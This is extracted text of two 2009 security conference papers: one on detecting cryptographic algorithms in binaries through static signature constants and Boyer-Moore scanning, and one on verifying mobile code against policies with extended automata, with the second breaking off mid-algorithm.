http://www.ll.mit.edu/mission/communications/ist/corpora/ ideval/data/index.html

Researching on Cryptographic Algorithm Recognition Based on Static Characteristic-Code Tie-Ming Liu, Lie-hui Jiang, Hong-qi He, Ji-zhong Li, and Xian Yu National Digital Switching System Engineering & Technology Research Center Zhengzhou, Henan Province 450002, China [email protected]

Abstract. Recognizing cryptographic algorithm from the binary codes plays an important role in checking the malicious codes and protecting the security of computer systems. This paper firstly introduces the current situation about the algorithm recognition and characteristic-code checking, makes use of the software reverse-engineering technology in order to extract the characteristiccodes from all kinds of the cryptographic algorithms and builds up the static characteristic database about the cryptographic algorithms. Then the paper introduces Boyer-Moore matching algorithm to design a scanning tool for the cryptographic algorithms, tests its efficiency and discusses the corresponding reliability; finally, the paper points out the developmental direction for algorithm recognition and technologies, which will be adopted in the field of software reverse engineering. Keywords: Algorithm Recognition, Cryptographic Algorithm, Characteristiccode, Disassemble, Decompile.

1 Introduction In the field of communication and computer security, the security of data transmission and software system often depends on some cryptographic algorithm, and at the same time the viruses and Trojans also use the protection mechanism of cryptographic algorithm to hide their static characteristic. Recognizing the cryptographic algorithm from the binary codes can play an active pole in checking the malicious codes and protecting the computer security. Research on algorithm recognition, which belongs to the category of program understanding[1], is mainly optimizing codes and analyzing programs based on the source codes. Prof. Robert Metzger in MIT had already adopted an automated recognizing and replacing system based on AST (Abstract Syntax Tree) technology [2], and the result is better. The national researchers used Bayes decision[3] model to recognize whether the cryptographic algorithm is contained in the target files. This method need lots of executive codes as samples and subroutines as the basic unit when recognizing, however, it cannot locate the specific cryptographic algorithm. The cryptographic algorithm recognizing technology based on characteristic-codes checking proposed by the paper can effectively search the cryptographic algorithms in the target binary files and mark their names. D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 140–147, 2009. © Springer-Verlag Berlin Heidelberg 2009

Researching on Cryptographic Algorithm Recognition

141

2 Associated Research 2.1 The Characteristic-Code Checking Technology The static characteristic-code checking technology is typically applied in the virus checking and recognition. This method is that collecting the known specific characteristic-code of virus in a database, and the virus checking engine will analyze the target file to check whether virus is in the file or not, according to the characteristic-code stored in the database. The reliability of static characteristic-code checking technology is dependent on the static characteristic-code database, so many anti-virus software should update their virus database regularly to cut out the virus and their varieties. There are many strategies used for locating the characteristic-code of new virus and also different anti-virus software manufacturers use different strategies. The crucial module in the anti-virus engine is the characteristic-code database, because the accuracy and timeliness of extracting the characteristic-code will greatly impact the antivirus efficiency. In the document [4] there are three methods, the MD5 format, string format and two-segment checksum format, for extracting the characteristic-code. 2.2 The Algorithm Recognition Technology In the field of reverse engineering, the algorithm recognition mainly begins to study from the aspects of the binary level, the assembly level and the high language level. All the levels of algorithm recognition in the reverse engineering and the whole framework used is shown as Figure 1. The algorithm recognition in the binary level is using the static characteristic-code for marking an algorithm. This technology is used for checking viruses, not seen frequently for the algorithm recognition. This paper applies the static characteristiccode in the algorithm recognition after studying the cryptographic algorithm mechanism. The algorithm recognition in the assembly level needs to disassemble the binary file[5] by using the mutual disassembly and heuristic algorithm in order to increase the precision. Usually, this level of algorithm recognition is achieved in the statistical way, so large numbers of samples are required; the semantics analysis can effectively mark the dynamic executive process, and this technology can increase the precision and reliability of recognition. But there is not the corresponding achievement at home and abroad yet. The algorithm recognition in the high language level needs to decompile based on disassembly for the target files to improve the program readability[6]. So far, HexRayes is one of the mature decompiler developed by Hex-Rayes SA Corporation. This software can decompile partly and totally under the X86 instruction set, so the algorithm recognition in connection with the source code in the program understanding can be used as a source of reference. The target of recognition is the high language created by the decompiling result. This research has not been seen usually at home and abroad.

142

T.-M. Liu et al.

binary code segment

disassemble

disassembler

result

algorithm

algorithm

recognition

recognition

decompiler

decompiler

result algorithm recognition

recognition based on

recognition based

recognition based on

characteristic-code and

on semantics and

data ming

statistic

AST and characteristic expression

……

……

……

Fig. 1. The algorithm recognition in reverse engineering and it’s key technologies

3 Extracting the Characteristic-Code from Cryptographic Algorithms Extracting the characteristic-code from cryptographic algorithms is important because the precision is dependent on its reliability. The cryptographic algorithms [7] use the static characteristic-code, such as the initialization link value, addition constants, S box, interchange box, big prime numbers, and it is found that these characteristiccodes will appear in the code section or data section from the disassembly result when analyzing the standard database of cryptographic algorithms reversely by using reverse-analyzing tools. Therefore, the common cryptographic algorithm can be marked by these static characteristic-codes. The flow of the static characteristic-code database is constructed as shown below, Figure 2.

re s ea rch o n m e c ha nis m of c om m on cry pto gra phi c al gorit hm

in itia liz ed li nk v alu e ad ditio n co ns ta nts

…

e x trac t the c ha rac te ris tic-c od e from c ry pto gra ph ic a lgo ri thm s

S bo x

b uild t he b as e o f c ry p tog rap hic

inte rc ha nge box

al gori thm s ta tic c ha rac te r-c od e

Fig. 2. Extracting framework the characteristic-code from cryptographic algorithms

The cryptographic algorithm, according to the differences of the cryptographic mechanism, is divided into Hash cryptographic algorithm, grouping cryptographic algorithm and public key cryptographic algorithm. The process of extracting the three algorithms will be discussed on subsequently and some examples will be given to explain in detail.

Researching on Cryptographic Algorithm Recognition

143

3.1 The Characteristic-Code of Hash Function Hash function can map the finite length input into fix-length output, and the efficiency is high. The structure of hash function is grouping iterative typically: the finite length input is divided into xi groups, each of which is r bits, and this division needs extra bit to pad, making sure that the total length is multiple of r. Each group xi as the input of compression function f, which regards the intermediate result of n bits and the next input group xi computed forward as parameters, can compute a new intermediate result of n bits. Hash function uses the initialization value to deal with the cryptographic data. Next, the static characteristic-code of SHA256 is introduced as an example. The SHA256 algorithm can create hashing values of 256 bits. During the initial period, 8 initialized 32-bit numbers are used: 0x6A09E667, 0xBB67AE85, 0x3C6EF372,0xA54FF53A,0x510E527F,0x9B05688C,0x1F83D9AB,0x5BE0CD19. SHA256 algorithm can make use of different ways to finish the above initialization. However, the 8 constants are unchangeable, so 8 initialized 32-bit link values are chosen as the static characteristic-codes. After extracting the characteristic-code, the target file will be scanned. If all of the 8 initialized 32-bit link values defined by SHA256 algorithm are matched with the values in the target codes, SHA256 algorithm is contained in the target file. For example, the code segment shown in Figure 3 has scanned all 8 constants. Because of the appearance of above characteristic-code, it is conjectured that this file contains SHA256 algorithm. By disassembling and analyzing this file, it can be proved that the function of this code is finishing the initialization of SHA256 algorithm. 00401225 8B442404 00401229 83602000 0040122D 83602400 00401231 C70067E6096A 00401237 C7400485AE67BB 0040123E C7400872F36E3C 00401245 C7400C3AF54FA5 0040124C C740107F520E51 00401253 C740148C68059B 0040125A C74018ABD9831F 00401261 C7401C19CDE05B

mov and and mov mov mov mov mov mov mov mov

eax,[esp+ARG_0] dword ptr [eax+20H],0 dword ptr [eax +24H],0 dword ptr [eax],6A09E667H dword ptr [eax +4],0BB67AE85H dword ptr [eax +8],3C6EF372H dword ptr [eax +0CH],0A54FF53AH dword ptr [eax +10H],510E527FH dword ptr [eax +14H],9B05688CH dword ptr [eax +18H],1F83D9ABH dword ptr [eax +1CH],5BE0CD19H

Fig. 3. The target code segment including static character-code of SHA256 algorithm

Because the little-endian way is adopted under Intel architecture, the constants in the target codes are: 67E6096A,85AE67BB,72F36E3C,3AF54FA5,7F520E51, 8C68059B,ABD9831F, 9CDE05B. The static characteristic-code database of hash cryptographic algorithm that contains that code of MD4, MD5 and SHA256 can be constructed by large numbers of statistic analysis.

144

T.-M. Liu et al.

3.2 The Characteristic-Code of Grouping Cryptographic Algorithm The mathematical model of grouping cryptographic algorithm can be abstracted to several processes: clear data, key, encryption, encrypted data and decryption. The encryption of grouping key is: the sequence encoded by the clear data is divided into some groups of equal length, and then the clear data and key sequences are input. Under the control of the key, the encrypted data are output by cryptographic algorithm in equal length. The encrypted data are stored and transmitted, and the decryption key sequence is also input. Finally, the clear data of equal length are output by decryption algorithm under the control of key. The grouping key uses S box and interchange box as constants when realization. Next, AES grouping algorithm as an example is introduced to show the condition of S box in the target file. S box, which is operated for table searching when encrypting groups, is defined a static array. For example, S box in AES algorithm is typically defined as: Static const u32Sbox0[256]= { 0xC66363A5, 0xf87C7C84, 0xEE777799, 0xF67B7B8D, 0xFFF2F20D, 0xD66B6BBD,0xDE6F6FB1, 0x91C5C554, 0x60303050, 0x02010103, 0xCE6767A9, 0x562B2B7D, 0xE7FEFE19, 0xB5D7D762, 0x4DABABE6, …… } //S box of AES S box as a characteristic word is used for scanning and checking a target file. If S box defined by AES grouping cryptographic algorithm is matched with some information in the file, the target file probably contains AES algorithm. For instance, S box appears in the code section shown in Figure 4. So the conjecture is reasonable. 10004170 DATA 00 00 00 00 00 00 00 00 A5 63 63 C6 84 7C 7C F8 10004180 DATA 99 77 77 EE 8D 7B 7B F6 0D F2 F2 FF BD 6B 6B D6 10004190 DATA B1 6F 6F DE 54 C5 C5 91 50 30 30 60 03 01 01 02 100041A0 DATA A9 67 67 CE 7D 2B 2B 56 19 FE FE E7 62 D7 D7 B5 100041B0 DATA E6 AB AB 4D 9A 76 76 EC 45 CA CA 8F 9D 82 82 1F Fig. 4. The target code section including S box of AES algorithm

After disassembling the target code and analyzing the result, AES grouping cryptographic algorithm is surely contained. In order to improve the matching efficiency, it is not necessary for using the whole S box as the characteristic-code of cryptographic algorithm when constructing the static characteristic-code database. On the premise of not affecting accuracy, only choosing a part of S box is OK. The static characteristic-code database of grouping cryptographic algorithm that contains that code of DES, AES, RC5 and RC6 can be constructed by large numbers of statistic analysis.

Researching on Cryptographic Algorithm Recognition

145

3.3 The Characteristic-Code of Public Key Cryptographic Algorithm The public key password is denoted by a kind of trap door uni-directional function: Function f is a uni-directional function, if arbitrary x, the field of definition in f, is −1 easy to compute f(x), all of y, the field of value in f, cannot get the result of f ( y) , even if f is known. But if some auxiliary information (trap door information) is given, f −1 ( y) can be computed, then Function f is trap door uni-directional function. The public key mechanism is designed for this principle, then the auxiliary information (trap door information) is the key. The security of this kind of password relies on its computing complexity according to the real situation. Currently, there are two categories of popular public key mechanism: one is based on big integer factoring, and the typical one is RSA; another one is based on discrete logarithm, for example, the EIGamaI public key and the elliptical curve public key mechanism. The public key mechanism has many static characteristic[8]. RSA is used for big integer factoring, so a lot of big prime numbers will appear when realizing it. The characteristic of big prime number in the target code is introduced, RSA being shown as an example. The code that creates big prime numbers usually contains a small prime number table, so the small prime numbers appear in the data section as magic numbers, as shown in Figure 5. 17 29 3B 49 61

00 00 00 00 00

00 00 00 00 00

00 00 00 00 00

1D 00 00 00 1F 00 00 00 25 2B 00 00 00 2F 00 00 00 35 3D 00 00 00 43 00 00 00 47 4F 00 00 00 53 00 00 00 59 65 00 00 00 67 00 00 00 6B

00 00 00 00 00

00 00 00 00 00

00 00 00 00 00

Fig. 5. The example of the small prime numbers appear in the data section

Generally, it is required that the size of multiprecision integer is found as quickly as possible. A searching table containing 256 bytes is used for saving checking time for each bit in one byte. So the searching table and small prime number code segment can be regarded as the static characteristic-code for marking the public key cryptographic algorithm. By doing a lot of statistic analysis, it is constructed that the static characteristic-code database of public key cryptographic algorithms that contain RSA, DSA, ElGamal, etc.

4 The Matching Algorithm of Cryptographic Algorithm Recognition The quality of matching algorithm can directly affect the recognition efficiency, and the subsequent shifting process does not take full advantage of candidate shifting each time during execution in the common matching algorithm. Suppose that the length of the target string is n, the length of pattern string is m, and the time complexity is O(nm+1). Boyer-Moore algorithm[9] imports two functions, F(x) and G(x), in order to make full use of the subsequent shifting process. F(x) is the location table that every

146

T.-M. Liu et al.

letter is met when counting from the right side in the alphabet of pattern string x. G(x) is also a table, which can gives the position where each possible postfix of x is when appearing the second time by counting from the right side. The implementation of Boyer-Moore algorithm is shown as Figure 6. Begin initialize A,x,text,n←Length[text],m←Length[x] F(x)←Last-Occurrence Function G(x)←Good-Suffix Function s←0; while s≤n-m do j←m; while j>0 and x[j]=text[s+j] do j←j-1; if j=0 then Output the Location; s←s+G(0); else s←s+max[G(j),j-F(text[s+j])]; return end Fig. 6. Boyer-Moore algorithm

5 Test and Conclusion In order to verify the speed and reliability of recognizing the characteristic-code and analyze the common applications, the test platform is: Windows XP Pentium4 2.8G 512M memory. The result is shown as Table 1.

，

，

Table 1. The scanning result of cryptographic algorithm characteristic-code No. 1 2 3 4

The scanned file name Adobe Acrobat Acrobat.dll MS Office Exchcsp.dll MS Office Word.exe WinRAR 3.02 Unacev2.dll

File size ˄B˅

Scanning time˄S˅

11,866,112

4.719

247,296

0.125

12,037,688

4.797

75,264

0.047

5

UltraEdit-32 SftpDLL.dll

565,248

0.281

6

Winzip Pro WZEAY32.dll

856,064

0.328

The displacement address of characteristic words in the file MD5:0060AA4D,SHA1:001A754F,SHA512:005EF891, SHA384:005EF733, AES:0087B900, RC2:0087B9A0, BASE64:007534F8, MD2:0087A1E0 MD5:000304F6,SHA1:00005394,DES:00009550, RC2:00009410,BASE64:000019B8, MD2:00038F50 MD5_UNICODE:00104726, SHA1_UNICODE:00104726, TEA:002C3841 SHA1:0000A60A, Blowfish:000099F2 Blowfish:00060FE8,CAST:00065C0C,DES:000647C8, SHA1:00020128, MD2:0007390C, MD5:00020194, RC2:00073D1C, AES:0005C320, RIPEMD:00027B79 SHA1: 00003C28, CAST: 0008C6F0 DES: 0008A9D0, MD5: 00003C8A RC2: 000B9360, AES: 0008CB19

Suppose that the size of file i is gi, the scanning time is ti, and the average speed is η=∑gi/∑ti=2.49M/s. The maximal size of the file in the tested data is 12.037M bytes and spent 4.797s.

Researching on Cryptographic Algorithm Recognition

147

The result shows that this scanning tool can find the common cryptographic algorithm information from the target codes quickly, and the speed will decrease as the characteristic-code database increases. The scanning time increases linearly and this cannot affect its practicability. The probability of conflict between the characteristic words is very small, so the result has high reliability.

6 Future Works The reliability of the method, which is proposed by this paper -- the cryptographic algorithm recognizing technology based on characteristic-codes checking, is mainly dependent on the static characteristics database of cryptographic algorithms, so it has definite limitations; however, in the process of communication, software encryption and decryption, their security is relied on the security of cryptographic algorithm itself, so users adopt the standard cryptographic database during processing, and because of the limited modification about the cryptographic algorithm itself, this method has considerable reliability. Essentially, algorithm recognition needs to make sure some lexeme movements directed by a section of codes, and judging whether the two of them is equivalent had been proved that this is a NP- complete problem; in theory, algorithm recognition should keep on studying the algorithm lexeme function description, the target information extracted by the reverse analysis. The technologies, e.g. the abstract algorithm description, dataflow analysis and expression restoration, can be applied in the field.

References 1. Alias, C.: Program Optimization by Template Recognition and Replacement. University of Versailles Saint-Quentin (2005) 2. Metzger, R.: Automatic Algorithm Recognition and Replacement. MIT, Cambridge (2003) 3. Li, J.-z., Jiang, L.-h., Yin, Q.: Cryptogram Algorithm Recognition Technology Based on Bayes Decision-making. Computer Engineering 34(20), 159–163 (2008) 4. Jin, Q., Wu, G.-x., Li, D.: Research of anti-virus engine and automatic extraction of computer virus signatures. Computer Engineering and Design 28(24) (2007) 5. Chen, H.-w., Liu, C.-l.: Principle of Compiling. National Defense Industry Press, Beijing (2000) 6. Cifuentes, C.: Reverse Compilation Techniques. Queensland University (1994) 7. Wu, S.-z., Zhu, S.-x.: Applied Cryptography. China Machine Press, Beijing (2000) 8. Harvey, I.: Cipher Hunting: How To Find Cryptographic Algorithms In Large Binaries. nCipher Corporation Ltd. (2001) 9. Li, H.-d., Yao, T.-x.: Pattern Classification. China Machine Press, Beijing (2003)

Verification of Security-Relevant Behavior Model and Security Policy for Model-Carrying Code Yonglong Wei, Xiaojuan Zheng, Jinglei Ren, Xudong Zheng, Chen Sun, and Zhenhao Li School of Software, Northeast Normal University, Changchun, China [email protected], [email protected], {jinglei.ren, dong128, bbsunchen, zhenhaolee}@gmail.com

Abstract. This article presents a method of verifying the safety of untrusted mobile code, using the model of security-relevant behaviors of code. This method verifies whether models violate users’ security policies to help users decide which programs to run and which not, and hence ensures the security of users’ systems and devices. Based on the framework of model-carrying code, we make several improvements: using the extended pushdown automaton (EPDA) as the program behavior model, reducing ambiguity in regular expressions over events (REE), proposing a new verification algorithm according to above significant improvements. Keywords: mobile code security, verification, behavior model, security policy, model-carrying code.

1

Introduction

With rapid growth in the use of the Internet and wireless networks, malware, such as viruses, Trojan horses, worms, spyware, are widely spread as hidden in mobile codes and become a dire threat to users’ information security. In order to meet the challenge concerning mobile code security, R. Sekar et al. proposed the security framework of model-carrying code (MCC) [1]. In spite of the many advantages of MCC method over traditional ones, there are still problems, among witch the most significant is the limited precision of the program behavior model and the ambiguity in expressing security policies. To overcome these problems and make MCC method more practical, we make the following improvements to the MCC method: (1) We use the extended pushdown automaton(EPDA) to model security-relevant program behaviors. This new model features in extended attributes including a call stack and state variables which make the PDA more precise so that one sort of impossible paths is eliminated 

This work was supported by the key project of Science and Technology Planning of Jilin, P.R.China (20080323) and National Collegiate Innovative Experiment Program.

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 148–156, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

Verification of Security-Relevant Behavior Model and Security Policy

149

and many mimicry attacks [7] can be detected. (2) We define extended finite state automaton(EFSA) to model the security policy and use standard greedy quantifiers for regular expressions over events(REE) [4], by which much ambiguity in policy expression is eliminated. (3) We provide a new algorithm for verification of the EPDA-based program behavior model and the EFSA-based security policy. In order to make MCC framework more applicable to wireless networks and mobile codes. We have also implemented a prototype system on Java Platform Micro Edition (Java ME). The organization of this paper is as follows: related work are introduced first in Section 2; formal definitions of the program behavior model and the security policy are given respectively in Section 3 and Section 4; in Section 5, procedures of the verification algorithm are given, including analysis of its complexity and proof of equivalence between defined automaton; and Section 6 is the conclusion.

2

Related Work

Researchers have proposed many approaches to ensure the security of execution of untrusted code, mostly based on static analysis or runtime monitor. Prevalent methods include sandbox [5], code signature [5,6], proof-carrying code [3], and java security model [9]. An important common problem with those methods is that they fail to consider the gap between code producers and consumers. Code producers are actually unable to foresee safety requirements of code consumers; the other way round, code consumers cannot determine in advance the proper limits on local recourse access of the program, since the security policy largely depends on program’s function. R. Sekar et al. proposed the model-carrying code method [1], providing an ideal safety framework for mobile code execution. The method originates from the domain of intrusion detection. Nevertheless, R. Sekar’s MCC still has defects in several aspects: (1) it uses EFSA as the program behavior model which cannot capture a programs’ function call and return behaviors, and therefore allow impossible paths and possibility of mimicry and evasion attacks [7]; (2) the expression of security policy using REE is ambiguous and imprecise, which may lead to extra false matches when compared with operation sequences and affect the performance of verification.

3

Security-Relevant Behavior Model: EPDA

We employ a new way to identify relations between calls to the same function that are triggered at different points of the program. The automaton pushes a specific symbol to the call stack when the function is called at some point and then pops the symbol when function returns to determine the next state the program reaches after the call. Specifically, we use the EPDA as the model of security-relevant behaviors of code, which is formally defined as follows:

150

Y. Wei et al.

Definition 3.1 M = (Q, Σ, Γ, δ, q0 , z, F, n, m, S, A, β0 , con, ass), where Q is a finite set of internal states, Σ is the finite set of function names of system calls, Γ is a finite set of symbols called the stack alphabet, δ: Q × (Σ ∪ λ) × Γ → finite subsets of Q × Γ ∗ is the transition function, q0 ∈ Q is the initial state, z ∈ Γ is the stack start symbol, F ⊆ Q is the set of final states, n is the maximal number of arguments of system calls, m is the number of state variables, S is the alphabet of a first-order language without universal and existential qualifiers whose variable symbols are v1 , v2 ... vm , p1 , p2 ... pn , A is a S-structure, β0 is the initial assignment in A, a map {v1 , v2 ...vm } → |A|, con: Q × (Σ ∪ λ) × Γ × Q × Γ ∗ → the set of S-formulas is a function that maps each state transition to a condition, ass: (the set of functions {v1 , v2 ...vm } → |A|)×Q×(Σ∪λ)×Γ ×Q×Γ ∗×|A|n → (the set of functions {v1 , v2 ...vm } → |A|). Let I = (Σ ∪ {λ}) × |A|n be the set of input alphabet. The tuple (q, w, u, β), where q is the current state, w is the unread part of the input string, u is the stack contents and β is a map {v1 , v2 ...vm } → |A| is called an instantaneous description of an EPDA. A move from one instantaneous description to another will be denoted by the symbol . (q1 , aw, bx, β1 )  (q2 , w, yx, β2 ) is possible if and only if 1. 2. such 3.

(q2 , y) ∈ δ(q1 , a(1), b) and A  con(q1 , a(1), b, q2 , y)[β1 ∪ θ] where θ is function {p1 , p2 ...pn } → |A|n that θ(pi ) = a(i + 1) and β2 = ass(β1 , q1 , a(1), b, q2 , y, a(2), a(3)...a(n + 1)).

Since EPDA-based behavior models can carry additional information about function calls and returns, they are more precise than EFSA and lead to less impossible paths and higher complexity.

4

Security Policy: EFSA

Much the same way as traditional MCC, the security policy is expressed by EFSA, but we redefine EFSA as the following tuple so that it can be used in the formal proof and the algorithm description in Section 5: Definition 4.1 The EFSA is defined by the tuple M = (Q, Σ, δ, q0 , F, n, m, S, A, β0 , con, ass),

Verification of Security-Relevant Behavior Model and Security Policy

151

where Q is a finite set of internal states, Σ is the finite set of function names of system calls, δ: Q × (Σ ∪ λ) → finite subsets of Q is the transition function, q0 ∈ Q is the initial state, F ⊆ Q is the set of final states, n is the maximal number of arguments of system calls, m is the number of state variables, S is the alphabet of a first-order language without universal and existential qualifiers whose variable symbols are v1 , v2 ... vm , p1 , p2 ... pn , A is a S-structure, β0 is the initial assignment in A, a map {v1 , v2 ...vm } → |A|, con is a computable function Q × (Σ ∪ λ) × Q → the set of S-formulas is a function that maps each state transition to a condition, ass is a computable function (the set of functions {v1 , v2 ...vm } → |A|) × Q × (Σ ∪ λ) × Q × |A|n → (the set of functions {v1 , v2 ...vm } → |A|). If ass(β, q1 , a, q2 , π1 ...πn ) = β then ass is called trivial assignment. Let I = (Σ ∪ {λ}) × |A|n be the set of input alphabet. The tuple (q, w, β), where q is the current state, w is the unread part of the input sequence, and β is a map {v1 , v2 ...vm } → |A| is called an instantaneous description of a EFSA. A move from one instantaneous description to another will be denoted by the symbol . (q1 , aw, β1 )  (q2 , w, β2 ) is possible if and only if 1. q2 ∈ δ(q1 , a(1)) and 2. A  con(q1 , a(1), q2 )[β1 ∪ θ] where θ is function {p1 , p2 ...pn } → |A|n such that θ(pi ) = a(i + 1) and 3. β2 = ass(β1 , q1 , a(1), q2 , a(2), a(3)...a(n + 1)). Moves involving an arbitrary number of steps will be denoted by ∗ . On occasions where several automata are under consideration we will use M to emphasize that the move is made by the particular automaton M .

5 5.1

Formal Verification of EPDA and EFSA Finding an Equivalent EFSA for a EPDA

Behavior models of code are based on EPDA while security policies are based on EFSA. To verify whether models satisfy policies, we need to build a product automaton of EPDA and EFSA. That requires us to find an equivalent EFSA for EPDA. The proof of their equivalence is given as below. Definition 5.1. The language accepted by EPDA M is the set L(M ) = {w ∈ I ∗ : (q0 , w, z, β0 ) ∗M (p, λ, u, β), p ∈ F , β a map {v1 , v2 ...vm } → |A|}.

152

Y. Wei et al. 

Definition 5.2. The language accepted by EFSA M is the set 

L(M ) = {w ∈ I ∗ : (q0 , w, β0 ) ∗M (p, λ, β), p ∈ F , β a map {v1 , v2 ...vm } → |A|}. Theorem 5.1   For any EPDA M , there is an EFSA M such that L(M ) = L(M ) Proof Suppose M = (Q, Σ, Γ, δ, q0 , z, F, n, m, S, A, β0, con, ass),  construct M as follows,     Q = Q × Γ × (range(δ) ∪ {z}), Σ = Σ, δ : Q × (Σ ∪ λ) → finite subsets of    Q , q2 ∈ δ (q1 , a) if and only if (q2 (1), q2 (3)) ∈ δ(q1 (1), a, q1 (2)), q0 = (q0 , z, z),      F = {q ∈ Q : q(1) ∈ F }, n = n, m = m, S = S ∪ {St, link, top} where St is a variable symbol, link a binary function symbol, top a unary function   symbol, A is an extension of A such that |A | = |A| ∪ Γ ∗ , for aw, v ∈ Γ ∗ , 









topA (aw) = a, link A (aw, v) = vw, β0 = β0 ∪ (St, z), con : con (q1 , a, q2 ) = con(q1 (1), a, q1 (2), q2 (1), q2 (3)) ∧ top(St) = q1 (2) ∧ top(link(St, q2 (3))) = q2 (2),  ass : (the set of functions of the form ({v1 , v2 ...vm } → |A|) ∪ {(St, w ∈ Γ ∗ )}) × Q × (Σ ∪ λ) × Q × |A|n → (the set of functions of the form ({v1 , v2 ...vm } →  |A|) ∪ {(St, w ∈ Γ ∗ )}) such that ass (β ∪ {(St, w)}, q1 , a, q2 , t ∈ |A|n ) = ass(β, q1 (1), a, q2 (1), t) ∪ {(St, link(w, q2 (3)))}. We now only need to prove that for any w ∈ I ∗ , we have (q0 , w, z, β0 ) kM     (p, λ, u, β) for some p ∈ F , if and only if (q0 , w, β0 ) kM  (p , λ, β ) for some   p ∈ F . The proof is by induction: 1. The base case:  For the initial instantaneous description of M (q0 , w, z, β0 ), M has a initial instantaneous description of the form ((q0 , z, t), w, β0 ∪{(St, z)}) for some t ∈ Γ ∗ . 2. The induction step: (q1 , ax, by, β1 ) M (q2 , x, vy, β2 ) if and only if (q2 , v) ∈ δ(q1 , a(1), b), A  con(q1 , a(1), b, q2 , v)[β1 ∪ θ] where θ is function {p1 , p2 ...pn } → |A|n such that θ(pi ) = a(i + 1), and β2 = ass(β1 , q1 , a(1), b, q2 , v, a(2), a(3)...a(n + 1)); if and only if (q2 , v) ∈ δ(q1 , a(1), b),  A  con(q1 , a(1), b, q2 , v) ∧ top(St) = b ∧ top(link(St, v)) = top(vy)[β1 ∪ θ ∪ {(St, by)}] where θ is function {p1 , p2 ...pn } → |A|n such that θ(pi ) = a(i + 1), and β2 ∪ {(St, vy)} = ass(β1 , q1 , a(1), b, q2 , v, a(2), a(3)...a(n + 1)) ∪ {(St, link(by, v))} = ass(β1 , q1 , a(1), b, q2 , v, a(2), a(3)...a(n + 1)) ∪ {(St, link(β(St), v))} where β = β1 ∪ {(St, by)};  and by the construction of M , if and only if ((q1 , b, t), ax, β1 ∪{(St, by)}) M  ((q2 , top(vy), v), x, β2 ∪ {(St, vy)}) for some t ∈ Γ ∗ . We have proved that (q0 , w, z, β0 ) kM (p, x, u, β)   if and only if (q0 , w, β0 ) kM  ((p, top(u), t), x, β ∪ {(St, u)}) for some t ∈ Γ ∗ for all k ∈ N .

Verification of Security-Relevant Behavior Model and Security Policy

153

Further, (q0 , w, z, β0 ) kM (p, λ, u, β) for some p ∈ F and u ∈ Γ ∗   if and only if (q0 , w, β0 ) kM  ((p, top(u), t), λ, β ∪ {(St, u)}) for some p ∈ F , some t ∈ Γ ∗ , and u ∈ Γ ∗ ,       if and only if (q0 , w, β0 ) kM  (p , λ, β ) for some p ∈ F . End of Proof Proof of Theorem 5.1 demonstrates that EPDA has no more descriptive power than EFSA and also shows how to construct the equivalent EFSA for an EPDA. 5.2

Improvements to REE

It is inconvenient and inefficient for users to define policies directly using EFSA due to lack of easy and interactive expression. Therefore MCC introduces regular expressions over events (REE) [4] to express and define security policies. REE can be efficiently transformed into equivalent EFSA. However, there may be more than one ways for a sequence of function calls to be matched by a pattern. We reduce the ambiguity in expression of the policy by using the standard quantifiers in REE. The default mode of matching is greedy strategy and control symbol ? can set a non-greedy mode. For example, the policy pattern P 3 = a∗?(a(x)|x = 3, n := x)a∗ indicates n = 3. There are several algorithms to transform REE to EFSA. A straightforward one is to transform REE to NFA first and then transform NFA to DFA. For a REE of length m, this algorithm takes O(2m ) time [8]. 5.3

Algorithms for Verification

Suppose EPDA m is a security-relevant behavior model of code, EFSA p is a policy and EFSA v is the matching result of m and p: m = (Qm , Σm , Γm , δm , qm 0, zm , Fm , nm , mm , Sm , Am , βm , conm , assm ) p = (Qp , Σp , Γp , δp , qp 0, Fp , np , mp , Sp , Ap , βp , conp , assp ) v = (Qv , Σv , Γv , δv , qv 0, Fm , nv , mv , Sv , Av , βv , conv , assv ) where, (1) qv0 is the initial state of v, qv0 = join(qm0 , qp0 ), c = join(a, b) is a function to build the product automaton v = m × p , and c inherit all properties in a and b. (2) Fv is the set of final states of v, Fv = Fp × Qm Qv ∈ (Qp × Qm ) (3) δv is the transition function of v, subset of Qv × (Σv ∪ λv ) × Γv → Qv × Γv∗ , created by algorithm merge. If there are feasible paths in this product v that lead to the final states, then the policy is violated and v points out all such violations. Otherwise, the model m is supposed to be safe. Obviously the verification phase has two steps: building product of two automaton and exploring the feasible paths to the final states.

154

Y. Wei et al.

Product of EFSA and EPDA Algorithm: Merge Transitions 1. for each tm ∈ δm , tp ∈ δp 2. as described in definition 3.1 and definition 4.1: if ∃tm such that (qm1 , am wm , t, βm1 )  (qm2 , wm , t, βm2 ) and tp such that (qp1 , ap wp , βp1 )  (qp2 , wp , βp2 ), then transitions tp and tm can be merged as the following steps according to the result of boolean operation on conm and conp , and get the result tv ∈ δv . let conv = conm ∩ conp (a) if conv ⊆ conm ∩ conp , create tv for v according to tp such that ((qm1 , qp1 ), av wv , βv1 )  ((qm2 , qp2 ), wv , βv2 ), let assv = assm ∪ assp (b) if conv ⊆ conm and conv  conp , create tv for v according to tm such ˇ let assv = assm that ((qm1 , qp1 ), av wv , βv1 )  ((qm2 , qp1 ), wv , βv2 )¨ıijN (c) if conv ⊆ conp and conv  conm , create no transition for v 3. repeat steps 1) to 2) until δm or δp are empty For EPDA m with M states and EFSA p with N states, this algorithm takes O (M × N )2 ) time. Algorithm: Merge States 1. 2. 3. 4. 5.

for each qp ∈ Qp , qm ∈ Qm create a state qv for Qv , where qv is merged from qp and qm if qp == qp0 and qm == qm0 then let qv = qv0 , the initial state of v; if qp ∈ Fp then push qv into Fv repeat steps 1) to 4) until Qp and Qm are empty

Path Exploration. In order to find a path from the start state to final states in the resulting EFSA faster, we provide a search strategy that takes into account the identity of state variables. Suppose a and b both reach an identical state and currently contain the same variables, a and b are equivalent for further exploration. At this point, a and b can be merged and this obviously will reduce the complexity of the verification algorithm. Algorithm: Check Path 1. Initialize all symbols. Create 3 queues stateQ, varQ, stackQ to store the states of automata, the state of variables and the state of stack. Create a table V isitedSet to mark the visited paths. 2. push all qv0 into stateQ 3. pop qv ∈ Qv , varv , zv ∈ Γ from stateQ, varQ, stackQ, where var is the current state of variables. 4. if qv ∈ V isitedSet then goto 3) else mark qv as visited state in V isitedSet. 5. if qv ∈ Fv then return the path. 6. for each transitions δv which start with qv :

Verification of Security-Relevant Behavior Model and Security Policy

155

